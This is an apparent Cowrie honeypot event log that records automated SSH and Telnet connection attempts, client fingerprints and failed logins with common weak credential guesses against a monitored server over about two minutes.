{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:43:49.338805Z","src_ip":"212.227.125.160","session":"e6cacaea6172"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:43:49.340396Z","src_ip":"212.227.125.160","session":"e6cacaea6172"}
{"eventid":"cowrie.login.failed","username":"test2","password":"12345","message":"login attempt [test2/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:43:50.170540Z","src_ip":"212.227.235.229","session":"2aa1d29b176a"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:51.984822Z","src_ip":"212.227.235.229","session":"2aa1d29b176a"}
{"eventid":"cowrie.session.closed","duration":12.784566402435303,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:58.110584Z","src_ip":"212.227.125.160","session":"24751aa2ef0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36663,"dst_ip":"1.2.3.4","dst_port":23,"session":"4650726fa1b9","protocol":"telnet","message":"New connection: 212.227.125.160:36663 (1.2.3.4:23) [session: 4650726fa1b9]","sensor":"my-vps","timestamp":"2025-08-31T05:43:58.321914Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48318,"dst_ip":"1.2.3.4","dst_port":22,"session":"e62f794a0c1a","protocol":"ssh","message":"New connection: 212.227.125.160:48318 (1.2.3.4:22) [session: e62f794a0c1a]","sensor":"my-vps","timestamp":"2025-08-31T05:44:04.580768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:44:05.153418Z","src_ip":"212.227.125.160","session":"e62f794a0c1a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:44:05.155365Z","src_ip":"212.227.125.160","session":"e62f794a0c1a"}
{"eventid":"cowrie.login.failed","username":"test2","password":"12345","message":"login attempt [test2/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:44:07.607193Z","src_ip":"212.227.125.160","session":"e62f794a0c1a"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:09.097183Z","src_ip":"212.227.125.160","session":"e62f794a0c1a"}
{"eventid":"cowrie.session.closed","duration":12.793544292449951,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:11.115365Z","src_ip":"212.227.125.160","session":"4650726fa1b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36910,"dst_ip":"1.2.3.4","dst_port":23,"session":"4943abc60dc3","protocol":"telnet","message":"New connection: 212.227.125.160:36910 (1.2.3.4:23) [session: 4943abc60dc3]","sensor":"my-vps","timestamp":"2025-08-31T05:44:11.351538Z"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:44:15.245162Z","src_ip":"212.227.235.229","session":"27c0a8a74724"}
{"eventid":"cowrie.session.closed","duration":12.772741317749023,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:24.124213Z","src_ip":"212.227.125.160","session":"4943abc60dc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37142,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d47e820bc7e","protocol":"telnet","message":"New connection: 212.227.125.160:37142 (1.2.3.4:23) [session: 6d47e820bc7e]","sensor":"my-vps","timestamp":"2025-08-31T05:44:24.346139Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48106,"dst_ip":"1.2.3.4","dst_port":22,"session":"93593c900d19","protocol":"ssh","message":"New connection: 212.227.235.229:48106 (1.2.3.4:22) [session: 93593c900d19]","sensor":"my-vps","timestamp":"2025-08-31T05:44:25.482126Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53362,"dst_ip":"1.2.3.4","dst_port":22,"session":"8eec63557d6a","protocol":"ssh","message":"New connection: 212.227.235.229:53362 (1.2.3.4:22) [session: 8eec63557d6a]","sensor":"my-vps","timestamp":"2025-08-31T05:44:25.519652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:44:25.520332Z","src_ip":"212.227.235.229","session":"8eec63557d6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:44:25.794382Z","src_ip":"212.227.235.229","session":"8eec63557d6a"}
{"eventid":"cowrie.login.failed","username":"flavia","password":"1234","message":"login attempt [flavia/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:44:26.930753Z","src_ip":"212.227.235.229","session":"8eec63557d6a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:28.207038Z","src_ip":"212.227.235.229","session":"8eec63557d6a"}
{"eventid":"cowrie.session.closed","duration":"91.5","message":"Connection lost after 91.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:28.987352Z","src_ip":"212.227.235.229","session":"27c0a8a74724"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":59728,"dst_ip":"1.2.3.4","dst_port":22,"session":"467fa8656744","protocol":"ssh","message":"New connection: 43.159.36.188:59728 (1.2.3.4:22) [session: 467fa8656744]","sensor":"my-vps","timestamp":"2025-08-31T05:44:30.633027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:44:30.633990Z","src_ip":"43.159.36.188","session":"467fa8656744"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:44:30.879199Z","src_ip":"43.159.36.188","session":"467fa8656744"}
{"eventid":"cowrie.login.failed","username":"jing","password":"jing","message":"login attempt [jing/jing] failed","sensor":"my-vps","timestamp":"2025-08-31T05:44:31.905202Z","src_ip":"43.159.36.188","session":"467fa8656744"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:44:32.862634Z","src_ip":"212.227.125.160","session":"e6cacaea6172"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:33.152831Z","src_ip":"43.159.36.188","session":"467fa8656744"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:44:34.613414Z","src_ip":"212.227.235.229","session":"93593c900d19"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:44:34.614575Z","src_ip":"212.227.235.229","session":"93593c900d19"}
{"eventid":"cowrie.session.closed","duration":12.775568008422852,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:37.121608Z","src_ip":"212.227.125.160","session":"6d47e820bc7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37387,"dst_ip":"1.2.3.4","dst_port":23,"session":"5933b6564da4","protocol":"telnet","message":"New connection: 212.227.125.160:37387 (1.2.3.4:23) [session: 5933b6564da4]","sensor":"my-vps","timestamp":"2025-08-31T05:44:37.339190Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50124,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e73a95e1dfd","protocol":"ssh","message":"New connection: 212.227.235.229:50124 (1.2.3.4:22) [session: 3e73a95e1dfd]","sensor":"my-vps","timestamp":"2025-08-31T05:44:41.801900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:44:41.802921Z","src_ip":"212.227.235.229","session":"3e73a95e1dfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36728,"dst_ip":"1.2.3.4","dst_port":22,"session":"d96a2c51ce27","protocol":"ssh","message":"New connection: 212.227.235.229:36728 (1.2.3.4:22) [session: d96a2c51ce27]","sensor":"my-vps","timestamp":"2025-08-31T05:44:42.084039Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:44:42.090295Z","src_ip":"212.227.235.229","session":"3e73a95e1dfd"}
{"eventid":"cowrie.login.failed","username":"vscode","password":"vscode","message":"login attempt [vscode/vscode] failed","sensor":"my-vps","timestamp":"2025-08-31T05:44:43.277656Z","src_ip":"212.227.235.229","session":"3e73a95e1dfd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:44:44.301166Z","src_ip":"212.227.235.229","session":"d96a2c51ce27"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:44:44.301928Z","src_ip":"212.227.235.229","session":"d96a2c51ce27"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:44.567302Z","src_ip":"212.227.235.229","session":"3e73a95e1dfd"}
{"eventid":"cowrie.session.closed","duration":"74.2","message":"Connection lost after 74.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:46.665926Z","src_ip":"212.227.125.160","session":"e6cacaea6172"}
{"eventid":"cowrie.login.failed","username":"test2","password":"1234567","message":"login attempt [test2/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:44:48.857512Z","src_ip":"212.227.235.229","session":"d96a2c51ce27"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":35582,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8e5bdb42e82","protocol":"ssh","message":"New connection: 170.64.166.123:35582 (1.2.3.4:22) [session: b8e5bdb42e82]","sensor":"my-vps","timestamp":"2025-08-31T05:44:49.767023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:44:49.767690Z","src_ip":"170.64.166.123","session":"b8e5bdb42e82"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:44:50.047799Z","src_ip":"170.64.166.123","session":"b8e5bdb42e82"}
{"eventid":"cowrie.session.closed","duration":12.781525135040283,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:50.120642Z","src_ip":"212.227.125.160","session":"5933b6564da4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37632,"dst_ip":"1.2.3.4","dst_port":23,"session":"418051f8979e","protocol":"telnet","message":"New connection: 212.227.125.160:37632 (1.2.3.4:23) [session: 418051f8979e]","sensor":"my-vps","timestamp":"2025-08-31T05:44:50.331097Z"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:50.650467Z","src_ip":"212.227.235.229","session":"d96a2c51ce27"}
{"eventid":"cowrie.login.failed","username":"app","password":"app1234@abc","message":"login attempt [app/app1234@abc] failed","sensor":"my-vps","timestamp":"2025-08-31T05:44:51.209940Z","src_ip":"170.64.166.123","session":"b8e5bdb42e82"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:44:52.492997Z","src_ip":"170.64.166.123","session":"b8e5bdb42e82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41270,"dst_ip":"1.2.3.4","dst_port":22,"session":"081411e33f51","protocol":"ssh","message":"New connection: 212.227.235.229:41270 (1.2.3.4:22) [session: 081411e33f51]","sensor":"my-vps","timestamp":"2025-08-31T05:44:58.142405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:44:58.391052Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:44:58.562200Z","src_ip":"212.227.235.229","session":"081411e33f51"}
{"eventid":"cowrie.session.closed","duration":12.779661178588867,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:03.110684Z","src_ip":"212.227.125.160","session":"418051f8979e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54854,"dst_ip":"1.2.3.4","dst_port":22,"session":"67745c3fd163","protocol":"ssh","message":"New connection: 212.227.125.160:54854 (1.2.3.4:22) [session: 67745c3fd163]","sensor":"my-vps","timestamp":"2025-08-31T05:45:03.292665Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37869,"dst_ip":"1.2.3.4","dst_port":23,"session":"9fb55f3fa535","protocol":"telnet","message":"New connection: 212.227.125.160:37869 (1.2.3.4:23) [session: 9fb55f3fa535]","sensor":"my-vps","timestamp":"2025-08-31T05:45:03.340543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:45:03.942986Z","src_ip":"212.227.125.160","session":"67745c3fd163"}
